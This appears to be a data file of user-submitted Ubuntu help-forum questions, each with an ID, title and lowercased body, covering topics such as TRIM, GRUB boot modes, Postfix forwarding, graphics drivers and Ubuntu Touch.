399717	unable to get trim to work on ubuntu 12.10	i am trying to use the fstrim command on my machine . the configuration is as follows : ubuntu @ ip-172-16-10-56 : ~/test $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal and i have created the fstrim in the /etc/cron.daily using the following commands : sudo root vi /etc/cron.daily/fstrim and fstrim file contains : # ! /bin/sh # by default we assume only / is on an ssd . # you can add more ssd mount points , separated by spaces . # make sure all mount points are within the quotes . for example : # ssd_mount_points='/ /boot /home /media/my_other_ssd ' ssd_mount_points='/mnt ' for mount_point in $ ssd_mount_points do fstrim $ mount_point done and then saved it and tried to run it using the command : ubuntu @ ip-172-16-10-56 : /etc/cron.daily $ sudo /etc/cron.daily/fstrim fstrim : /mnt : fitrim ioctl failed : operation not supported i get that error everytime . i am not sure what is it that i am doing wrong . i am following the instructions mentioned in how to enable trim ? any help will be greatly appreciated . thanks anjali
399718	ubuntu help with wired connection	well , i installed ubuntu 12.04 [ desktop ] on vmware workstation 1.0.0 , and when i open firefox , it ca n't connect to the internet because the wired connection is n't connected , but on my windows 8.1 computer [ the one with vmware workstation on ] it has a wired connection already connected and it 's working fine , on ubuntu it does n't . can someone help me please ?
399720	ca n't ssh or samba on lan with ip address	in my apartment building , every computer that connects to the provided networking switch is assigned a wan accessible ip address . i have an ubuntu machine exporting a samba share which i am able to access outside of the apartment building . the problem is that when my laptop ( windows 7 ) is attached to the same networking switch , i can not access the ubuntu machine over samba or ssh , but i can with the windows ping command . what do i need to do to be able to reach the samba share from the local networking switch ?
399731	can utorrent server be installed on ubuntu server 12.04 ?	i am relatively new to ubuntu server . i would like to know if utorrent server can be installed onto ubuntu server 12.04 . i have looked and have been unable to locate a source for utorrent for 12.04 and am curious if it is possible if some steps could be provided .
399732	how to check if grub is in efi or bios mode ?	is there a command at the grub shell that would indicate if the machine is presenting efi or bios firmware ? i 'm using grub 2.00 on a 2010 mac pro . this computer has efi firmware of course . but i have been trying for a couple of days to get it to boot ubuntu in bios-emulation mode for want of nvidia display drivers . my understanding is that by the time grub is running , the decision to use efi or bios emulation has already been made . so how can i check from grub ?
399733	what enterprise clustering and high availability solutions run on ubuntu ?	i am interested in comparing the enterprise clustering and high availability solutions that run on ubuntu and that have been successfully used in enterprises with the clustering and high availability solutions that run on sles and rhel .
399735	how to set limits on how much stuff each account can store ?	i want to set a limit on how much each account can store , on ubuntu 13.10 . is there a way to do this ? for example , i want to make it so each person can only store 40 gbs on their account
399738	how to get my chrome window back to a state where the resize function works normally ?	ubuntu 12.04 lts , chrome 31.0.1650.63 . somehow my chrome browser window has gotten into a state where it behaves different from before and different from any other window that i have ever experienced . on this chrome window , when i drag a side to change the size of the window then the opposite side is resized at the same time in the opposite direction . when i drag a corner to move two sides then both opposite sides are also moved ( in the opposite direction , so the window maintains the position of its center ) . shutdown and restart of the computer did not remove the problem . how do i change things back to the state where dragging one side or one corner affects only that side or corner ?
399739	transmission stops responding frequently / slowing down ubuntu	so i 'm using transmission to download some files but it has been acting really weird recently . on the program , i 'm getting a bit of slow download speed and the program freezes a lot , and sometimes the gui stays black and white , even the close button , that usually is orange . i 'm also feeling that it is slowing down my pc in general . folder browsing takes more time to load with the program on , and any music playing starts freezing ( they work fine with the program off ) . i 've tried running transmission on the terminal but i did n't got any error messages , and the freezing continued even after i closed transmission , and i had to close the terminal for it to work ( the process was still running , though ) . i 'm not sure what have caused this . recently i 've put transmission to start with ubuntu , and i have tried downloading a big file ( like ~40 gb ) , but because of the constant freezing i gave up .
399740	game compatibility	i was wondering if ubuntu supports games like battlefield , minecraft , etc . because the os seems cool , but i want to still be able to play my games . thanks , ryan j
399741	reconnect wired network after accidentally disconnecting in menu bar	short version : how can i re-connect my wired network ? i accidentally clicked 'disconnect ' in the unity menu bar ( panel ? ) for 'wired connection 1 ' , and ca n't work out how to reconnect ( short of a reboot ? ) longer version - i 'm just on the fringes of wifi range , so plugged in an ethernet cable , and went to disconnect the wifi , but i miss-hit in the menu , and disconnected the wired network instead , which i ca n't reconnect from the menu . the only menu item under the `` ethernet networks '' sections , is 'disconnect ' greyed out/disabled . if i chose `` edit connections ... '' at the bottom , it opens up `` network connections '' , i can see the wired connection , and even edit it 's properties , but not connect to it . wifi is still working fine ( if i walk back in range ! ) i 'm a linux newb , but not afraid of the command line ( if suitably guided ) , but i 'd prefer a menu based solution ( as i 'll be more likely to remember it next time ) . output of ifconfig -a eth0 link encap : ethernet hwaddr f0:1f : af:43 : a7:1d up broadcast multicast mtu:1500 metric:1 rx packets:26 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3353 ( 3.3 kb ) tx bytes:9775 ( 9.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:7121 errors:0 dropped:0 overruns:0 frame:0 tx packets:7121 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1206554 ( 1.2 mb ) tx bytes:1206554 ( 1.2 mb ) wlan0 link encap : ethernet hwaddr 70:18:8b : a3:0b:59 inet addr:192.168.0.26 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :7218:8bff : fea3 : b59/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:156987 errors:0 dropped:120 overruns:0 frame:0 tx packets:92589 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:202917998 ( 202.9 mb ) tx bytes:11010436 ( 11.0 mb )
399742	warning : the following packages can not be authenticated . `apt-key update` does n't work	i 'm trying to install bitcoind by simply doing sudo apt-get install bitcoind , but i get this error saying that the following packages could not be authenticated : libdb5.1++ libcrypto++9 bitcoind i can simply install them without authenticating them , but since this program may handle money , i would like them to be the correct ones . so i found this solution here on askubuntu , which suggests to do the following : $ sudo apt-key update $ sudo apt-get update after the first command , it lists four keys of which it says that all remain unchanged . the second command simply does the usual , but it ends with a message saying that there was a gpg-error . after some blabla , it then says that the following signatures are invalid ( freely translated from dutch ) : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > and the following signatures could not be verified because the public key is not available : no_pubkey 1f968b3903d886e7 and the following sugnatures were invalid : badsig e585066a30c18a2b opera software archive automatic signing key 2013 < packager @ opera.com > and that getting stuff from the following address has failed : http : //extras.ubuntu.com/ubuntu/dists/precise/release does anybody know what i can do to solve this ?
399744	how to install a dual-boot ubuntu in bios mode and mac os x ?	i 'm trying to install ubuntu in bios emulation mode , not the native efi firmware , on my mac pro ( 2010 ) . i 'm doing nvidia cuda / opencl development and i require the nvidia proprietary graphics drivers . there is pretty universal consensus around the web that the nvidia proprietary drivers will not run in efi mode . i have not been able to get to that bios emulation mode condition . the most clear-cut installation method i have tried is to install without grub using ubiquity -b from the live cd in combination with refind . this installation is very smooth , but the resulting ubuntu install is running in efi mode . an alternative i have tried is to install without -b and to install the boot loader to a different partition on the same drive . this time , my machine first boots to the grub menu , and correctly starts ubuntu 13.10 , but it starts in efi mode . ( evidenced by ls /sys/firmware/efi ) i have confirmed that the hard drive is partitioned with hybrid-mbr , and the grub2 partition is marked as bootable on the mbr . ( using gdisk /dev/sdb ) i 'm not sure about this , but i am wondering if the ubuntu installer is installing an efi version of grub instead of a bios version , because the ubuntu installer is running in efi mode . if this is the case , how can one start the installer from the live cd in bios mode ? i have this related question regarding , is the bios-emulation vs efi decision made before , during , or after the grub boot loader ?
399747	ubuntu touch - multiple app windows	i 'm learning how to make ubuntu touch os applications , and i looked all over the web for something , but did n't find any satisfying results . this is either because i am the first to ask this question , or maybe because i am not using the proper vocabulary in my question . in any case , here 's my question . how do i make an app with a screen that says `` hello world '' with a button , and make it so that when i press the button it goes to a different page ? by 'page ' i mean something like a tab , that is n't listed at the top of the screen , and is attained by clicking a button , not by selecting the tab from the list at the top of the screen . if my idea is still unclear , consider the system settings app on ubuntu touch . click on anything . wifi , background , battery , i literally mean anything . what happened ? you clicked a button and the app displayed a new page . that 's what i want to learn how to do .
399755	why does my cpu 's clockspeed keep dropping ?	this is the most unusually problem that i have . i have an amd turion tl-56 processor . it 's dual core and the default frequency is 1.8 ghz . for the past few months , the clock speed has been droppign to 800mhz . i installed a program that allows me to control the clock speed for the k8 processor family called cpupowerd so i am able to adjust the speed back to what it 's suppose to be easily . i installed the program about 2 months before this problem started happening . it typically occurs when i 'm running an application , or applications that require a rather large amount of system resources . if i run videos on youtube via firefox , occasionally the clock speed will drop , not necessarily though . i will be obvious as the machine starts to become somewhat unresponsive , and with video streaming , the frame rate will drop dramatically . i know the clock speed of the processor is dropping because of the outputs from : $ cat /proc/cpuinfo | grep `` mhz '' cpu mhz : 800.000 cpu mhz : 800.000 and $ sudo cpupowerd -s cpupowerd 0.2.1 written by markus strobl . warning : this program could cause damage to your hardware ! vendor : amd family : k8 model : 4 mastercpuid : 0 affected cpuids : 0 1 current voltage ( vid ) : 0.8000 v ( 30 ) current frequency ( fid ) : 800 mhz ( 0 ) supported frequencies : 800 1600 1800 mhz i am able to reset it with $ sudo cpupowerd -- freq `` 0|1800 '' cpupowerd 0.2.1 written by markus strobl . warning : this program could cause damage to your hardware ! for a while i thought something from chrome was causing the problem ( as there were several chrome processes running even when i was n't using the browser ) . however , i uninstalled chrome and the problem still persists whenever i need to do something that requires more resources . this is particularly a problem when i run virtualbox which will cause the system to lock up completely ( 800mhz on a dual core processor just ca n't handle the sudden load ) . when booting , accessing the system bios does n't let me adjust the clockspeed which is set to 1800mhz ( as i want it ) . what is causing this shift in processing speed ? are there any logs that i can access that might shed light ? edit : regardless of what speed the processor is actually running out , dmidecode reports 1800mhz $ sudo dmidecode -t processor | grep `` speed '' max speed : 1800 mhz current speed : 1800 mhz
399756	is there a way to install ubuntu to my hard drive from a usb thumbdrive that 's running ubuntu	i want to install ubuntu ( thats on a flashdrive and is 10 gigs used already ) to my hard drive that i just formatted . is it possible to copy over the current ubuntu or not ?
399757	bt_get_capabilities warning slowing down audio apps	i 'm using a bluetooth audio receiver to stream music from my pc to an old stereo . everything works fine , except that everytime an app needs to use audio , and starts initializing alsa , it gets lots of warnings like this : alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started i know it 's safe to ignore them , but it takes about 20 seconds to initialize audio because of this . for instance , audacity takes too long to open , and crashes eventually by this . and there are also some apps that show a timeout error and i just ca n't use them if i have bluetooth turned on . i tried googling it and there seems to be a bug filled with bluez-alsa but could n't get more info than that . any workaround suggested ?
399758	ubuntu touch - .ogg files do n't transfer to device	i was making a sample app to handle .ogg files in qt creator . everything worked fine on the computer , and when i chose the option to `` run application on device '' everything worked perfectly . but when i `` install application on device '' and i run the app without the computer , the sound files do n't play anymore . they did on the computer with the `` run app on device '' option but not when the application is actually installed on the device . i tried the three methods of installing i know of , the qt creator run option , adb shell then click install package_name , and adb shell then pkcon install-local package_name . in all cases the sound does n't work . if anyone has any help to offer i 'd truly appreciate it . : )
399762	change gpu voltage	i 'd like to lower my gpu voltage . i already tried all programs which i found via google like atioverdrivectrl and so on but none seems to work . whenever i start cgminer the voltage changes back to default although cgminer ca n't even change the voltage . is my only option now to flash the bios ? that 's ridiculous . why can i do that under windows so easy with any program but under linux i need to flash the bios ? i always thought that linux is way better in configuring the system to your needs ... any help ? would greatly appreciate it ubuntu 13.10 x64
399764	editing/changing runlevels ?	i learned linux on redhat/fedora systems , and i really like there runlevels . the runlevels in ubuntu ( inherited from debian i 'm sure ) are weird , there is no way to get a no gui environment unless your turn off all the services manually ( your display manager , desktop , login manager , etc . ) , which is frustrating . is there any way to change my runlevels , so that they are the same as fedora 's ? and if i do that , will it negatively impact my system ? ( are other programs dependent on the default runlevels ? ) thank you , steven .
399767	how to access media files across android and ubuntu while using dual-boot	i 'm using dual-boot on my nexus 4 with android and ubuntu os . is there an option to access the media ( picture , music , video etc . ) files stored on mobile while boot in either os ? e.g . the stored music files on android want to be accessed when boot in ubuntu
399768	encrypted disk wo n't unlock anymore : not authorized to perform operation ( udisks-error-quark , 4 )	in 2012 i used ubuntu 's gnome-disks utility to encrypt an external drive . last year i was still being able to unlock it . but today i tried again on ubuntu 2012.04 and gnome-disks says : error unlocking encrypted device not authorized to perform operation ( udisks-error-quark , 4 ) how to solve this and unlock my data ?
399770	installing ubuntu phone	i have a htc one runing android 4.4 . i was wondering if ubuntu phone works for my phone . i read very quick the how to guide on the web page but i 'm not sure about doing it . has anyone done ? how does it work ?
399773	readding the wine submenu back into the main application launcher	so i 've accidentally removed the `` wine '' submenu required to access wine ( windows ) applications . ( i 'm running xubuntu , so i 'm using xfce ) how can i add it again .
399774	annoying viber notification	can i somehow put viber notification icon on top of the unity panel ( near dropbox and others ) ? ! it 's pretty ugly to stay in top left corner ...
399775	constant freezes when downloading torrent to ntfs partition	i 'm trying to download some large files and save them on an ntfs partition , but i 'm experiencing heavy freezes . this does not happen when i , say , set the torrent location to /home/user/downloads , but i do n't have enough free space on ~/to download files there . is there any way to get rid of those freezes ? i 've tried transmission and rtorrent , both had the same problem .
399776	emacs crashes x with nvidia drivers on 13.04	i just got a new dell u2713hm monitor , and in order to get resolutions above 1600x1200 i had to install the official nvidia drivers ( the card is a gt635 ) . things ( eventually ) got working , i have 2560x1600 resolution , good . the problem is if i try to run emacs or xemacs , from apt-get or compiled myself , the screen goes black and i find myself back at the login screen . there 's nothing suspicious that i can see in the xorg.log file , but in the lightdm log i see : * error in `/usr/bin/x ' : double free or corruption ( ! prev ) : 0x00007f2bc5575410 * i 'm using the nvidia-310 drivers .
399778	is there a way to disable on-screen boot logging	noob question : running ubuntu 13.04 ... system is being used as a kiosk , so all the log messages are irrelevant to anyone using it . can i suppress boot sequence messages from coming on-screen when system is powered up ? and perhaps display a custom splash-screen image instead ?
399779	repair python 2.7 installation on 12.04 lts	i upgraded python to 3.2 on ubuntu 12.04 lts . later , i noticed that ubuntu updates no longer were downloading and i have the infamous red circle icon in the menu bar . in troubleshooting this issue , i tried a number of suggested fixes which fail with errors that refer to a python module for dbus . the errors suggest a problem with the python scripts due to some files not found in the python 2.7 directories or unsupported calls . it seems that python is broken . i ca n't use package manager or apt-get to try to re-install python 2.7 . i 've tried to remove 3.2 and install 2.7 but either operation ends with a series of runtime errors . has anyone see this type of issue or have an idea on how to resolve ? thanks .
399785	ubuntu on my new smartphone as substitute for android ? !	i want ubuntu on my new galaxy s4 now : - ) -- i do n't like android very much ... i 'd be really glad to stop this android thing on my very expensive phone ! would somebody be so kind to tell me about the progress in the ubuntu for phones project ... should i make a try ... ? ? ! thank you in advance ... ( i am unexperienced user with android but i know the advantages of linux-ubuntu quite well ! ! : ) best wishes to canonical from germany !
399793	2 lockscreens after resume from sleep ubuntu 13.10	last month , i installed ubuntu 13.10 on my laptop . since then i have the problem , that when the system resumes from sleep , i have 2 lockscreens , where i have to enter my password instead of one : resume = > lockscreen = > entering password = > desktop ( 1-2 seconds ) = > lockscreen = > entering password = > desktop i am using ubuntu 13.10 64bit and have unity and gnome shell installed on a thinkpad t430s .
399796	how to install leo-nano150n leoxys mini usb wifi adapter on ubuntu ?	i have a leoxys mini usb adapter ( lep - nano 150 n ) when i download the drivers , there is a folder named linux . but i find more folders inside it namely mt7601u , rt537x_rt3x7x and rt5572_rt3572 . i do not know what are those and how to install them . how do i install those drivers ?
399799	ubuntu maxes brightness after lock	if i press ctrl+alt+l , brighness level sets to the maximum . it started from latest `` ubuntu base '' update . how to disable this ?
399803	unable to ping from ubuntu server 12.04 terminal	i used mode_switch and was able to connect my 3g usb dongle with internet , i am also able to download that data , but unfortunately i am not able to ping any website any suggestion ? ? no pinging of data at all . thank you
399804	how to clear all memory or reset a password on ubuntu 12.04 lts	i recently had ubuntu 12.04 running on a pandaboard es . i set up a password with it to log in . well , today i decided to wipe the os off the sd card and re-install it . i formatted the sd card , re-installed the ubuntu image for 12.04 and booted my pandaboard es . it went through the resizing and came to the user screen , prompting me for my password , which i thought was odd seeings how i reinstalled it . so , i entered my old password and now it says my password is not correct . i have tried holding the shift key down about 50 times now and i 'm unable to get the boot menu to come up . it just boots to the user screen every time prompting me for a password . is there a way to completely erase all memory and start from scratch on the pandaboard es or another way around this ? keep in mind , i can not log in to get to the terminal . jamie
399805	my smart phone upgrade	i have my smartphone with android 4.0.1 version . it is original chinese brand tooky . can my phone os change to ubuntu ? please explain .
399809	how do i set up java path ?	i want to set up java in my pc running ubuntu 12.4 lts with 64 bit architecture . i followed different posts on this site to do the same but i am confused , whilst i try to navigate to usr/lib/jvm i see a lot of folders at this point . which one to set as path ? i have attached a screen shot to explain my issue : edit : i have java installed but i am stuck at setting the home for java . i executed java -version on my terminal and i had the following output : root @ pc-dev-a147 : / # java -version java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1ubuntu0.12.04.4 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) root @ pc-dev-a147 : / # edit : i think i solved the problem . these are the steps i took to gain the know how of how to do it : 1 ) to check if i have java or i have to install it . 2 ) what does this mysterious home enviornment variable do ? 3 ) finally how to locate and set the variable . now if i do echo $ java_home i get : root @ pc-dev-a147 : /home/johndoe/downloads/softwares/flashtool # echo $ java_home /usr/lib/jvm/java-1.6.0-openjdk root @ pc-dev-a147 : /home/junaid/downloads/softwares/flashtool # however i am stuck in a different issue now which is explained here
399814	loaded ubuntu 13.10 off external hdd , stuck on grub 2.00-19ubuntu2.1	i have an hp with windows 8.1 and i downloaded ubuntu 13.10 on to a 1tb wd my passport ultra and tried booting from it . now my laptop is stuck on grub 2.00-19ubuntu2.1 and i can not access anything outside of this , even after removing ext hdd after a full power down . ideally i want to boot from the usb at my choosing thru the windows 8 interface , and obviously restore use to my laptop . please help me , i am new to ubuntu . thank you in advance . edit was able to restore my laptop to usable condition . figured out where my install went wrong and know better going forward .
399815	postfix not recieving mail from email but does from sendmail ?	ok so i 'm trying to forward mail from my server ( lets call it tacobell.com ) to a external gmail account using postfix . the problem is when i send mail using another gmail or yahoo account to monkey @ tacobell.com , and i check var/log/mail.info , nothing shows up . however when i use sendmail in the terminal and send to the same address i get the following written into the log as well as the mail actually sending and ending up in my inbox : jan 4 00:02:48 machine postfix/local [ 6520 ] : 6c82db80c4a : to= < root @ tacobell.com > , relay=local , delay=0.01 , delays=0/0/0/0.01 , dsn=2.0.0 , status=sent ( delivered to command : procmail -a `` $ extension '' ) jan 4 00:02:48 machine postfix/qmgr [ 6497 ] : 6c82db80c4a : removed jan 4 00:09:58 machine postfix/pickup [ 6496 ] : b206cb80c46 : uid=0 from= < root > jan 4 00:09:58 machine postfix/cleanup [ 6540 ] : b206cb80c46 : message-id= < 20140104050958.b206cb80c46 @ machine > jan 4 00:09:58 machine postfix/qmgr [ 6497 ] : b206cb80c46 : from= < root @ tacobell.com > , size=265 , nrcpt=1 ( queue active ) jan 4 00:09:59 nightmachine postfix/smtp [ 6542 ] : b206cb80c46 : to= < destemail @ gmail.com > , orig_to= < monkey @ tacobell.com > , relay=gmail-smtp-in.l.google.com [ 74.125.142.26 ] :25 , delay=14 , delays=13/0/0.22/0.69 , dsn=2.0.0 , status=sent ( 250 2.0.0 ok 1388812199 qd7si6471164igb.62 - gsmtp ) jan 4 00:09:59 machine postfix/qmgr [ 6497 ] : b206cb80c46 : removed is there a reason for this ? how would i fix it ? i was following this tutorial . postfix/virtual : monkey @ tacobell.com destemail @ gmail.com main.cf : # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = machine alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = tacobell.com , machine , localhost.localdomain , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all home_mailbox = mail/ # added the following for mail server : o ! ! virtual_alias_domains = tacobell.com virtual_alias_maps = hash : /etc/postfix/virtual result when i do a dig tacobell.com mx query in terminal : ; ; answer section : tacobell.com . 21600 in mx 10 mail.tacobell.com . telnet tacobell.com 25 connected to tacobell.com . escape character is '^ ] ' . 220 machine esmtp postfix ( ubuntu )
399818	command history ( previous and next command ) in ngspice	this is driving me nuts . i am using ngspice in interactive mode on ubuntu . i expected the up and down arrows to scroll through previous commands just like in bash or pretty much any cli ever . however doing so in ngspice just prints out `` ^ [ `` or `` [ a '' . there is a history command and i am able to use `` ! '' to execute previously executed commands just like in bash but what i want to do is bring up a previous command and edit it ( like i can by pressing the up arrow in bash ) . is there any way to so this in ngspice or do i really have to keep typing out the command from scratch if i want to change it ?
399823	how to download applications from https : //apps.ubuntu.com	i am trying to download a image editor from https : //apps.ubuntu.com/cat/applications/gimp/ but as i click on `` available on software center '' a window opens to choose application , which application should i choose and from where ( location of application ) . and how to install application after its download
399824	how to install pygame ?	i am running ubuntu 13.10 . i have python 2.7.5 with anaconda 1.8.0 . whenever i start python and type import pygame it tells me that there is no module named pygame . how can i install pygame ?
399828	ubuntu 12.04 is burying our infoblox with dns requests	i 've got 80 computers that i 've installed ubuntu precise on . however , when i turn them on , they pound out thousands of dns requests constantly and bury our infoblox dns server - just those 80 computers will put it up to 90 % cpu utilization . the network guys are not happy & have to disable the ports so the other dhcp & dns traffic can get processed . i 've disabled ipv6 and turned off dnsmasq , which has reduced the queries a little , but i still see constant queries for the domain and aaaa requests for what appears to be a blank request . i ca n't figure out why the ipv6 requests are happening at all or why it is making the domain name requests and most of all , why these happen non-stop . any idea what 's going on & how to fix it ?
399829	i 'm stuck in grub !	so i 'm trying to get me fathers old dell inspiron 9200 laptop to work again , and i decided to install lubuntu on it because i do n't know much about linux other then it 's free , and lubuntu is extremely light-weight . because the laptops processor was a intel pentium m 755 / 2.0 ghz , i needed to find a non-pae iso . i went to this forum , and followed workaround number 3 : how can i install on a non-pae cpu ? ( error `` kernel requires features not present on the cpu : pae '' ) . it worked , i got the whole thing up and running ! yay ! i made the root password the same as my account password so that i would remember it as i wo n't be using this computer very often and i do n't want to forget it . anyway , i installed steam and it worked fine . then i tried to install java by using the synaptic package manager to select the program files then install them . ( my main computer is on windows os and as i said , i do n't know much about linux so i might screw up some terms ) . after that , i decided to reboot the laptop to make sure java was working . when the computer turned back on , i entered something called grub ? ? ? i have been searching forums as to how to get out of this mode , and most of the solutions include a live linux/ubuntu cd or usb . i have no idea how to get out as i do n't think i have one of these ! ! i do n't think i am in rescue mode , as it does n't say rescue mode on the screen anywhere . i do n't know what to do , please help . also if you decided to help , please explain as if you are talking to a person who knows absolutely nothing about linux . ( srry for typos ) edit : this is what the screen looks like except for the finer details , and the commands typed ,
399832	mozilla thunderbird will not configure my email address on setup	i am a recently new user to the ubuntu os . upon installation and organizing everything the way i prefer , i stumbled across a problem with setting up mozilla thunderbird . when attempting to connect my gmail account , thunderbird does not register my email and correct password for some reason . i receive a message saying that my account can not be configured due to an incorrect username or password . even though my information is correct it will not proceed with the initial setup . any suggestions would be of great help . thanks , lucas
399833	how to link these ?	currently running a tri boot and using gpodder the sync of podcast list works just fine but second system wants to re-download podcast episodes ... .question is would a ( ln ) from main dl dir be best way have considered ( ln -s ) but some podcasts have been in itunes in past and itunes loves to `` organize '' things each update and not looking forward to reconfigure each time sda configure below sda 250gb sata ( mbr ) sda1 40gb win7 x64 sda2 12gb page partition ( only 2gb onboard -- legacy d620 ) sda3 extended sda5 10gb mint 16 x64 sda6 10gb fc20 design spin x64 sda7 12gb linux-swap sda8 150-ish gb home ( /home & d : \ ) considering the following since main dir on sda8 wo n't change but which is best for linking to all system ln d : \ < u/n > \gpodder\ ... dev/sda8/home/ < u/n > /gpodder/ ... . or ln -s d : \ < u/n > \gpodder\ ... dev/sda8/home/ < u/n > /gpodder/ ... .
399834	setting up a home server but do n't know what to call what i 'm doing to ask for help	so i have a decent home server that i 'd like to do a couple things with : host a website ( i know how to do this so i 'm not worried about this ) create remote user storage - i 'd like to make something where i could log into a vpn ( ? ) and it give me account specific storage , i 'd like to be able to work from my files at home and back my linux computers up to this server , maybe in the form of images ? but how would i do this ? as part of a vpn i 'd like it to serve as a proxy for remote devices and an email server . which packages should i use to achieve these goals ? is there a name for what i 'm trying to do and is this a common thing to do ?
399835	ubuntu 13.04 installation no response	i installed ubuntu 13.04 into my usb with universal usb installer . when i plug it into my macbook pro retina 13 2012 edition , rebooted it and pressed alt to select to boot from my usb , it gets into it and lets me select `` try '' or `` install ubuntu '' . so i selected install , but when i got in it just shows the wallpaper and a mouse , and nothing else , so i ca n't install it . what can i do ?
399837	can not install fresh generated fglrx driver on ubuntu precise 12.04	i am trying to install the last available legacy fglrx drivers for my hd 42xx graphics card . i have generated debian packages by using the well known procedure : ./amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.run -- buildpkg ubuntu/precise when i am trying to install the first package which is fglrx_8.970-0ubuntu1_amd64.deb i get a strange error , this is the output of dpkg : ( reading database ... 174786 files and directories currently installed . ) unpacking fglrx ( from fglrx_8.970-0ubuntu1_amd64.deb ) ... dpkg : error processing fglrx_8.970-0ubuntu1_amd64.deb ( -- install ) : unable to open '/usr/lib/fglrx/libxvbaw.so.1.0.dpkg-new ' : no such file or directory processing triggers for ureadahead ... errors were encountered while processing : fglrx_8.970-0ubuntu1_amd64.deb i can not get rid of this error . the same happens when i do try to install the fglrx driver by using apt-get or synaptic .
399843	unable to create partition table/partitions	i have a strange situation at the moment and i am not sure if the issue lays on the side of the hardware . i wanted to create a new partition table with gparted as well as with cfdisk . both applications confirmed that they created it . but afterwards the table is still not existent , not readable . this is the error message which always occurs : disk /dev/sde does n't contain a valid partition table does anyone have any ideas ?
399844	black screen after system update ubuntu 13.10	hi bro i have a problem with my ubuntu 13.10 after system update . my ubuntu was black screen and there is a x cursor on my display . my gear intel core i3 2310m , 2 gb of ram , nvidia geforce gt 520m , 500gb hdd . how to fix that problem , thanks .
399845	my internet connection keeps drpping and this is the status	downstream upstream snr margin : 29.5 38.0 db line attenuation : 27.1 11.4 db data rate : 2053 509 kbps max rate : 17868 588 kbps power : 18.3 12.0 dbm crc : 0 0
399850	i ca n't load ubuntu on my hp pavilion g4 2308tx after installing it	after installing ubuntu 13 i can.t load it in installed windows 8 laptop when i choose ubuntu on operating system selection menu after entering to ubuntu there occurs error that ca n't load file , , , , , , , error occur please help me what to do
399851	how to burn ubuntu desktop v12.04.3-i386.iso file to a cd or a dvd disc ?	the ubuntu iso file i downloaded wants to burn exclusively to a cd disc , but the files in the iso file are too large to fit to any 700mb cd disc i currently have available . it wo n't accept a dvd as the destination media . are there any files that i can delete from the iso file ? alternatively , will extracting the files from the iso file and creating another bootable iso file acceptable to a dvd disc be a workable solution , or is there something i 'm missing in this endeavor ? thx ted
399852	can anyone please tell which is the best software in ubuntu to plot graph against data ?	can anyone please let me know which is the best software in ubuntu to plot graph against data ? ?
399855	plymouth error ! need help	my plymouth does n't work well.how can i fix it ? ? ? i ca n't change the themes and it also do n't show any picture on the file when i type 'plymouth ' in the dash .
399857	how to uninstall ubuntu from other ubuntu ?	i am newb in ubuntu . i installed ubuntu 13.10 from a livecd as a dual boot with windows 7 . it was working until a month ago and i found a lot of bugs here . yesterday after an update , video drivers crashed . i tried to fix it for 6 hours and decided to reinstall the ubuntu . i have no cd here and livecd on flash usb disk looks like dont works for me . so i decided to install stable ubuntu ( 12.04 ) instead of 13.10 from windows ( with wubi ) . it works fine now , but i have old ubuntu 13.10 mounted drive here and i still have it at the boot screen . how can i remove old ubuntu 13.10 from a hard drive and from a boot screen from the ubuntu 12.04 ? i dont have cd drive here .
399860	stricthostkeychecking=no refuse to connect	i was trying the accepted answer from this q & a : ssh : automatically accept keys in my script code the below line is unable to processed . ie . my script is stuck on below line . ssh $ { sshopts_infram- } root @ $ { infra1 } 'ssh -t -t -o stricthostkeychecking=no 'root @ $ { infra2 } > /dev/null 2 > & 1 is there a solution ?
399863	how come ubuntu is not compatible to the galaxy note 3	it is not compatible to the galaxy note 3 and i do not understand why it is only compatible to the galaxy nexus .
